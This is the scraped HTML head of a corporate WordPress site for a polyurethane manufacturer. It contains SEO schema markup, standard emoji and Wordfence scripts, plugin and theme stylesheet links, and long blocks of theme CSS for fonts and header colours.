yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://accellacorp.com/#organization","name":"","url":"https://accellacorp.com/","sameAs":[]},{"@type":"WebSite","@id":"https://accellacorp.com/#website","url":"https://accellacorp.com/","name":"Accella Polyurethane Systems","publisher":{"@id":"https://accellacorp.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://accellacorp.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"http://accellacorp.com/#webpage","url":"http://accellacorp.com/","inLanguage":"en-US","name":"Accella Polyurethane Systems","isPartOf":{"@id":"https://accellacorp.com/#website"},"about":{"@id":"https://accellacorp.com/#organization"},"datePublished":"2016-12-08T21:53:33+00:00","dateModified":"2019-03-26T14:48:00+00:00"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Accella Polyurethane Systems &raquo; Feed" href="https://accellacorp.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Accella Polyurethane Systems &raquo; Comments Feed" href="https://accellacorp.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='it-hover-effecthover_style-css' href='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC//css/hover-effect/imagehover-styles.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='it-hover-effectit_style-css' href='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC//css/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='it-hover-effectit_animate-css' href='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC//css/animate.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='it-hover-effectowl_carousel_css-css' href='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC//css/owl-carousel/owl.carousel.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='it-hover-effectowl_theme_css-css' href='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC//css/owl-carousel/owl.theme.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://accellacorp.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://accellacorp.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='go-pricing-styles-css' href='/wp-content/plugins/go_pricing/assets/css/go_pricing_styles.css?ver=3.3.4' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://accellacorp.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.3.1' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='grve-awesome-fonts-css' href='https://accellacorp.com/wp-content/themes/osmosis/css/font-awesome.min.css?ver=4.6.3' type='text/css' media='all' /> <link rel='stylesheet' id='grve-basic-css' href='https://accellacorp.com/wp-content/themes/osmosis/css/basic.css?ver=3.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='grve-grid-css' href='https://accellacorp.com/wp-content/themes/osmosis/css/grid.css?ver=3.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='grve-theme-style-css' href='https://accellacorp.com/wp-content/themes/osmosis/css/theme-style.css?ver=3.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='grve-elements-css' href='https://accellacorp.com/wp-content/themes/osmosis/css/elements.css?ver=3.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='grve-responsive-css' href='https://accellacorp.com/wp-content/themes/osmosis/css/responsive.css?ver=3.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://accellacorp.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.0' type='text/css' media='all' /> <link rel='stylesheet' id='redux-google-fonts-grve_osmosis_options-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C800%2C600%2C700%2C600italic%2C300&#038;ver=1546552815' type='text/css' media='all' /> <script type='text/javascript' src='/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC/js/owl-carousel/owl.carousel.js?ver=5.2'></script> <script type='text/javascript' src='/wp-content/plugins/iThemeland-Image-Hover-Effect-For-VC/js/wow/wow.js?ver=5.2'></script> <script type='text/javascript' src='/ajax/libs/gsap/1.11.2/TweenMax.min.js'></script> <script type='text/javascript' src='/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.3.1'></script> <script type='text/javascript' src='/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.3.1'></script> <script type='text/javascript' src='/wp-content/themes/osmosis/js/modernizr.custom.js?ver=2.8.3'></script> <link rel='https://api.w.org/' href='https://accellacorp.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://accellacorp.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://accellacorp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://accellacorp.com' /> <link rel="alternate" type="application/json+oembed" href="https://accellacorp.com/wp-json/oembed/1.0/embed?url=%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://accellacorp.com/wp-json/oembed/1.0/embed?url=%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//accellacorp.com/?wordfence_lh=1&hid=341D3266C0F85746980BE970E0D8135D'); </script><!-- Dynamic css --> <style type="text/css"> body { font-size: 14px; font-family: "Open Sans"; font-weight: 400; } input[type='text'], input[type='input'], input[type='password'], input[type='email'], input[type='number'], input[type='date'], input[type='url'], input[type='tel'], input[type='search'], textarea, select { font-family: "Open Sans"; } #grve-header .grve-logo.grve-logo-text a { font-family: "Open Sans"; font-weight: 400; font-style: normal; font-size: 18px; text-transform: uppercase; } #grve-header #grve-main-menu ul li ul li a { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 11px; text-transform: uppercase; } #grve-header #grve-main-menu > ul > li > a, #grve-header .grve-responsive-menu-text { font-family: "Open Sans"; font-weight: 800; font-style: normal; font-size: 12px; text-transform: uppercase; } h1, .grve-h1 { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 48px; text-transform: none; } h2, .grve-h2 { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 36px; text-transform: none; } h3, .grve-h3 { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 30px; text-transform: none; } h4, .grve-h4, .woocommerce h1 { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 24px; text-transform: none; } h5, .grve-h5, #reply-title, .grve-product-name, .woocommerce h2, .woocommerce-billing-fields h3, #order_review_heading { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 20px; text-transform: none; } h6, .grve-h6, .mfp-title, .woocommerce table.shop_table th, .woocommerce-page table.shop_table th, .woocommerce div.product .woocommerce-tabs ul.tabs li a, .woocommerce #content div.product .woocommerce-tabs ul.tabs li a, .woocommerce-page div.product .woocommerce-tabs ul.tabs li a, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs li a { font-family: "Open Sans"; font-weight: 600; font-style: normal; font-size: 14px; text-transform: none; } #grve-page-title .grve-title { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 60px; text-transform: uppercase; } #grve-page-title .grve-description { font-family: "Open Sans"; font-weight: 600; font-style: italic; font-size: 24px; text-transform: none; } #grve-portfolio-title .grve-title { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 60px; text-transform: uppercase; } #grve-portfolio-title .grve-description { font-family: "Open Sans"; font-weight: 600; font-style: italic; font-size: 24px; text-transform: none; } #grve-product-title .grve-title { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 60px; text-transform: uppercase; } #grve-post-title .grve-title, #grve-main-content.grve-simple-style .grve-post-simple-title { font-family: "Open Sans"; font-weight: 400; font-style: normal; font-size: 30px; text-transform: none; } #grve-header[data-fullscreen='no'] #grve-feature-section .grve-title { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 60px; text-transform: uppercase; } #grve-header[data-fullscreen='no'] #grve-feature-section .grve-description { font-family: "Open Sans"; font-weight: 600; font-style: italic; font-size: 24px; text-transform: none; } #grve-header[data-fullscreen='yes'] #grve-feature-section .grve-title { font-family: "Open Sans"; font-weight: 800; font-style: normal; font-size: 70px; text-transform: uppercase; } #grve-header[data-fullscreen='yes'] #grve-feature-section .grve-description { font-family: "Open Sans"; font-weight: 600; font-style: italic; font-size: 28px; text-transform: none; } .grve-leader-text p, p.grve-leader-text { font-family: "Open Sans"; font-weight: 300; font-style: normal; font-size: 28px; text-transform: none; } .grve-subtitle p, .grve-subtitle, .grve-accordion .grve-title, .grve-toggle .grve-title, blockquote, .woocommerce div.product span.price, .woocommerce div.product p.price, .woocommerce #content div.product span.price, .woocommerce #content div.product p.price, .woocommerce-page div.product span.price, .woocommerce-page div.product p.price, .woocommerce-page #content div.product span.price, .woocommerce-page #content div.product p.price { font-family: "Open Sans"; font-weight: 400; font-style: normal; font-size: 18px; text-transform: none; } .grve-small-text, small, #grve-meta-bar .grve-meta-elements a, #grve-meta-bar .grve-meta-elements li.grve-field-date, #grve-anchor-menu a, .grve-tags, .grve-categories, #grve-post-title #grve-social-share ul li .grve-like-counter, #grve-portfolio-bar #grve-social-share ul li .grve-like-counter, .grve-blog .grve-like-counter, .grve-blog .grve-post-author, .grve-blog .grve-post-date, .grve-pagination ul li, #grve-header-options ul.grve-options a span, .grve-pagination .grve-icon-nav-right, .grve-pagination .grve-icon-nav-left, #grve-comments .grve-comment-item .grve-comment-date, #grve-comments .comment-reply-link, #grve-comments .comment-edit-link, .grve-newsletter label, #grve-footer-bar .grve-social li, #grve-footer-bar .grve-copyright, #grve-footer-bar #grve-second-menu, #grve-share-modal .grve-social li a, #grve-language-modal .grve-language li a, .grve-bar-title, .grve-percentage, .grve-tabs-title li, .grve-pricing-table ul li, .logged-in-as, .widget.widget_recent_entries li span.post-date, cite, label, .grve-testimonial-name, .grve-hr .grve-divider-backtotop, .grve-slider-item .grve-slider-content span.grve-title, .grve-gallery figure figcaption .grve-caption, .widget.widget_calendar caption, .widget .rss-date, .widget.widget_tag_cloud a, .grve-widget.grve-latest-news .grve-latest-news-date, .grve-widget.grve-comments .grve-comment-date, .wpcf7-form p, .wpcf7-form .grve-one-third, .wpcf7-form .grve-one-half, .mfp-counter, .grve-related-post .grve-caption, .grve-comment-nav ul li a, .grve-portfolio .grve-like-counter span, .grve-portfolio .grve-portfolio-btns, .grve-portfolio .grve-filter, .grve-blog .grve-filter, .grve-image-hover .grve-caption, .grve-portfolio .grve-hover-style-2 figcaption .grve-caption, ul.grve-fields li, .grve-team-social li a, .grve-carousel-wrapper .grve-post-item .grve-caption, .grve-blog .grve-like-counter span, .grve-blog .grve-post-comments span, .grve-add-cart, .grve-map-infotext p, a.grve-infotext-link, #grve-meta-responsive, .woocommerce span.onsale, .woocommerce nav.woocommerce-pagination ul li, .woocommerce #content nav.woocommerce-pagination ul li, .woocommerce-page nav.woocommerce-pagination ul li, .woocommerce-page #content nav.woocommerce-pagination ul li, .woocommerce .woocommerce-result-count, .woocommerce-page .woocommerce-result-count, .woocommerce-review-link, .product_meta, table.shop_table td.product-name, .woocommerce .related h2, .woocommerce .upsells.products h2, .woocommerce-page .related h2, .woocommerce-page .upsells.products h2, .woocommerce .cross-sells h2, .woocommerce .cart_totals h2, .woocommerce .shipping-calculator-button, .woocommerce-page .shipping-calculator-button, .woocommerce-info:not(.woocommerce-Message), #grve-shop-modal .cart_list.product_list_widget li a, .woocommerce .widget_price_filter .price_slider_amount, .woocommerce-page .widget_price_filter .price_slider_amount, .woocommerce ul.cart_list li a, .woocommerce ul.product_list_widget li a, .woocommerce-page ul.cart_list li a, .woocommerce-page ul.product_list_widget li a, .woocommerce.widget_product_tag_cloud .tagcloud a, .grve-menu-description { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 10px !important; text-transform: uppercase; } .grve-author-info .grve-read-more, .more-link, .grve-read-more, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item .grve-media-content .grve-read-more span, .grve-newsletter input[type='submit'], .grve-search button[type='submit'], #grve-above-footer .grve-social li, .grve-btn, input[type='submit'], input[type='reset'], button, .woocommerce a.button, .woocommerce button.button, .woocommerce input.button, .woocommerce #respond input#submit, .woocommerce #content input.button, .woocommerce-page a.button, .woocommerce-page button.button, .woocommerce-page input.button, .woocommerce-page #respond input#submit, .woocommerce-page #content input.button, #grve-shop-modal a.button { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 11px !important; text-transform: uppercase; } #grve-main-content .vc_tta-tab > a, #grve-main-content .vc_tta-panel-title { font-family: "Open Sans"; font-weight: 700; font-style: normal; font-size: 10px !important; text-transform: uppercase; } #grve-main-content .vc_tta-accordion .vc_tta-panel-title { font-family: "Open Sans"; font-weight: 400; font-style: normal; font-size: 18px !important; text-transform: none; } </style><!-- Dynamic css --> <style type="text/css"> #grve-top-bar { line-height: 40px; background-color: #303030; color: #c9c9c9; } #grve-top-bar a { color: #c9c9c9; } #grve-top-bar a:hover { color: #ff6863; } #grve-top-bar .grve-language ul li a { background-color: #222222; color: #808080; } #grve-top-bar .grve-language ul li a:hover { background-color: #ff6863; color: #ffffff; } #grve-header[data-overlap='yes'][data-header-position='above-feature'][data-topbar='yes'] #grve-header-wrapper, #grve-header[data-overlap='yes'][data-header-position='above-feature'][data-topbar='yes'] #grve-inner-header { top: 40px; } #grve-top-bar, #grve-top-bar ul li.grve-topbar-item ul li a, #grve-top-bar ul.grve-bar-content, #grve-top-bar ul.grve-bar-content > li { border-color: #4f4f4f !important; } #grve-header #grve-inner-header { height: 90px; line-height: 90px; } #grve-header #grve-header-wrapper { height: 90px; } #grve-header #grve-inner-header .grve-logo img { max-height: 90px; } #grve-header #grve-header-options a.grve-open-button, #grve-header #grve-header-options a .grve-icon { width: 70px; height: 70px; line-height: 70px; } #grve-header[data-safebutton='right'] #grve-header-options { right: 0px; } #grve-header[data-safebutton='left'] #grve-header-options { left: 0px; } #grve-header .grve-menu-options { height: 90px; line-height: 90px; } #grve-header #grve-header-options .grve-options-wrapper, #grve-header #grve-header-options ul.grve-options li a .grve-icon::before { width: 70px; } #grve-header #grve-header-options ul.grve-options { line-height: 70px; } #grve-header #grve-header-options ul.grve-options li a { padding-left: 70px; } #grve-main-menu-responsive { color: #808080; background-color: #222222; } #grve-main-menu-responsive li a { color: #808080; background-color: #222222; } #grve-main-menu-responsive li a:hover { color: #ffffff; } #grve-main-menu-responsive ul li.current-menu-item > a, #grve-main-menu-responsive ul li.current-menu-parent > a, #grve-main-menu-responsive ul li.current_page_item > a, #grve-main-menu-responsive ul li.current_page_ancestor > a { color: #ffffff; } #grve-main-menu-responsive .grve-close-menu-button { color: #ffffff; background-color: #ff6863; } #grve-main-menu-responsive .grve-menu-options li a { color: #808080 !important; } #grve-main-menu-responsive ul li a .label { color: #ffffff; background-color: #ff6863; } #grve-main-menu-responsive.grve-style-2 .grve-more-btn:before, #grve-main-menu-responsive.grve-style-2 .grve-more-btn:after { background-color: #808080; } #grve-main-menu-responsive.grve-style-2 .grve-more-btn.close:before, #grve-main-menu-responsive.grve-style-2 .grve-more-btn.close:after { background-color: #ffffff; } #grve-header.grve-default #grve-inner-header, #grve-header.grve-default[data-sticky-header='shrink'] { background-color: rgba(255,255,255,1); } #grve-header.grve-default #grve-main-menu > ul > li > a, #grve-header.grve-default .grve-menu-options li a, #grve-header.grve-default .grve-logo.grve-logo-text a, #grve-header.grve-default .grve-responsive-menu-text { color: #3C3A35; } #grve-header.grve-default .grve-menu-button-line { background-color: #3C3A35; } #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li:hover > a, #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li.current-menu-ancestor > a, #grve-header[data-menu-type='simply'].grve-default #grve-main-menu > ul > li.active > a, #grve-header.grve-default .grve-menu-options li a:hover { color: #ff6863; } #grve-header[data-menu-type='button'].grve-default #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='button'].grve-default #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='button'].grve-default #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='button'].grve-default #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='button'].grve-default #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='button'].grve-default #grve-main-menu > ul > li:hover > a, #grve-header.grve-default .grve-menu-options li a .grve-purchased-items { color: #ffffff; background-color: #ff6863; } #grve-header[data-menu-type='box'].grve-default #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='box'].grve-default #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='box'].grve-default #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='box'].grve-default #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='box'].grve-default #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='box'].grve-default #grve-main-menu > ul > li:hover > a { color: #ffffff; background-color: #ff6863; } #grve-header.grve-default #grve-main-menu ul li ul a, #grve-header.grve-default #grve-header-options ul.grve-options a, #grve-header.grve-default #grve-main-menu ul li a:hover .label, #grve-header.grve-default #grve-main-menu > ul > li.megamenu > ul > li > a:hover, #grve-header.grve-default #grve-main-menu > ul > li.megamenu > ul { color: #808080; background-color: #222222; } #grve-header.grve-default #grve-main-menu ul li.current-menu-item > a, #grve-header.grve-default #grve-main-menu > ul > li.megamenu > ul > li > a { color: #ffffff; } #grve-header.grve-default #grve-main-menu ul li ul a:hover, #grve-header.grve-default #grve-header-options ul.grve-options a:hover, #grve-header.grve-default #grve-main-menu ul li a .label { color: #ffffff; background-color: #ff6863; } #grve-header.grve-default #grve-main-menu > ul > li.megamenu > ul > li { border-color: #4f4f4f; } #grve-header.grve-default #grve-header-options > li > a.grve-open-button, #grve-language-modal .grve-language li a:hover, #grve-language-modal .grve-language li a.active, #grve-share-modal .grve-social li a:hover { color: #3C3A35; background-color: rgba(255,104,99,0); } #grve-header.grve-default #grve-header-options > li:hover > a.grve-open-button { color: #ff6863; background-color: rgba(34,34,34,0); } #grve-header.grve-light #grve-inner-header, #grve-header.grve-light[data-sticky-header='shrink'] { background-color: rgba(60,58,53,0); } #grve-header.grve-light #grve-main-menu > ul > li > a, #grve-header.grve-light .grve-menu-options li a, #grve-header.grve-light .grve-logo.grve-logo-text a, #grve-header.grve-light .grve-responsive-menu-text { color: #ffffff; } #grve-header.grve-light .grve-menu-button-line { background-color: #ffffff; } #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li:hover > a, #grve-header[data-menu-type='simply'].grve-light #grve-main-menu > ul > li.current-menu-ancestor > a, #grve-header.grve-light .grve-menu-options li a:hover { color: #2e94d2; } #grve-header[data-menu-type='button'].grve-light #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='button'].grve-light #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='button'].grve-light #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='button'].grve-light #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='button'].grve-light #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='button'].grve-light #grve-main-menu > ul > li:hover > a, #grve-header.grve-light .grve-menu-options li a .grve-purchased-items { color: #ffffff; background-color: #ff6863; } #grve-header[data-menu-type='box'].grve-light #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='box'].grve-light #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='box'].grve-light #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='box'].grve-light #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='box'].grve-light #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='box'].grve-light #grve-main-menu > ul > li:hover > a { color: #ffffff; background-color: #ff6863; } #grve-header.grve-light #grve-main-menu ul li ul a, #grve-header.grve-light #grve-header-options ul.grve-options a, #grve-header.grve-light #grve-main-menu ul li a:hover .label, #grve-header.grve-light #grve-main-menu > ul > li.megamenu > ul > li > a:hover, #grve-header.grve-light #grve-main-menu > ul > li.megamenu > ul { color: #808080; background-color: #222222; } #grve-header.grve-light #grve-main-menu ul li.current-menu-item > a, #grve-header.grve-light #grve-main-menu > ul > li.megamenu > ul > li > a { color: #ffffff; } #grve-header.grve-light #grve-main-menu ul li ul a:hover, #grve-header.grve-light #grve-header-options ul.grve-options a:hover, #grve-header.grve-light #grve-main-menu ul li a .label { color: #ffffff; background-color: #ff6863; } #grve-header.grve-light #grve-main-menu > ul > li.megamenu > ul > li { border-color: #4f4f4f; } #grve-header.grve-light #grve-header-options > li > a.grve-open-button { color: #ffffff; background-color: rgba(255,104,99,0); } #grve-header.grve-light #grve-header-options > li:hover > a.grve-open-button { color: #ff6863; background-color: rgba(34,34,34,0); } #grve-header.grve-dark #grve-inner-header, #grve-header.grve-light[data-sticky-header='shrink'] { background-color: rgba(255,255,255,0); } #grve-header.grve-dark #grve-main-menu > ul > li > a, #grve-header.grve-dark .grve-menu-options li a, #grve-header.grve-dark .grve-logo.grve-logo-text a, #grve-header.grve-dark .grve-responsive-menu-text { color: #3C3A35; } #grve-header.grve-dark .grve-menu-button-line { background-color: #3C3A35; } #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li:hover > a, #grve-header[data-menu-type='simply'].grve-dark #grve-main-menu > ul > li.current-menu-ancestor > a, #grve-header.grve-dark .grve-menu-options li a:hover { color: #ffffff; } #grve-header[data-menu-type='button'].grve-dark #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='button'].grve-dark #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='button'].grve-dark #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='button'].grve-dark #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='button'].grve-dark #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='button'].grve-dark #grve-main-menu > ul > li:hover > a, #grve-header.grve-dark .grve-menu-options li a .grve-purchased-items { color: #ffffff; background-color: #ff6863; } #grve-header[data-menu-type='box'].grve-dark #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='box'].grve-dark #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='box'].grve-dark #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='box'].grve-dark #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='box'].grve-dark #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='box'].grve-dark #grve-main-menu > ul > li:hover > a { color: #ffffff; background-color: #ff6863; } #grve-header.grve-dark #grve-main-menu ul li ul a, #grve-header.grve-dark #grve-header-options ul.grve-options a, #grve-header.grve-dark #grve-main-menu ul li a:hover .label, #grve-header.grve-dark #grve-main-menu > ul > li.megamenu > ul > li > a:hover, #grve-header.grve-dark #grve-main-menu > ul > li.megamenu > ul { color: #808080; background-color: #222222; } #grve-header.grve-dark #grve-main-menu ul li.current-menu-item > a, #grve-header.grve-dark #grve-main-menu > ul > li.megamenu > ul > li > a { color: #ffffff; } #grve-header.grve-dark #grve-main-menu ul li ul a:hover, #grve-header.grve-dark #grve-header-options ul.grve-options a:hover, #grve-header.grve-dark #grve-main-menu ul li a .label { color: #ffffff; background-color: #ff6863; } #grve-header.grve-dark #grve-main-menu > ul > li.megamenu > ul > li { border-color: #4f4f4f; } #grve-header.grve-dark #grve-header-options > li > a.grve-open-button { color: #3C3A35; background-color: rgba(255,104,99,0); } #grve-header.grve-dark #grve-header-options > li:hover > a.grve-open-button { color: #ff6863; background-color: rgba(34,34,34,0); } #grve-header.grve-default.grve-header-sticky #grve-inner-header, #grve-header.grve-light.grve-header-sticky #grve-inner-header, #grve-header.grve-dark.grve-header-sticky #grve-inner-header { background-color: rgba(255,255,255,1); } #grve-header[data-sticky-header='advanced'][data-safebutton='right'].grve-header-sticky #grve-inner-header .grve-container { padding-right: 70px; } #grve-header[data-sticky-header='advanced'][data-safebutton='left'].grve-header-sticky #grve-inner-header .grve-container { padding-left: 70px; } /* Sticky Logo */ #grve-header.grve-header-sticky .grve-logo a.grve-sticky { display: inline-block; } #grve-header.grve-header-sticky #grve-main-menu > ul > li > a, #grve-header.grve-header-sticky .grve-menu-options li a, #grve-header.grve-header-sticky .grve-logo.grve-logo-text a, #grve-header.grve-header-sticky .grve-responsive-menu-text { color: #3C3A35; } 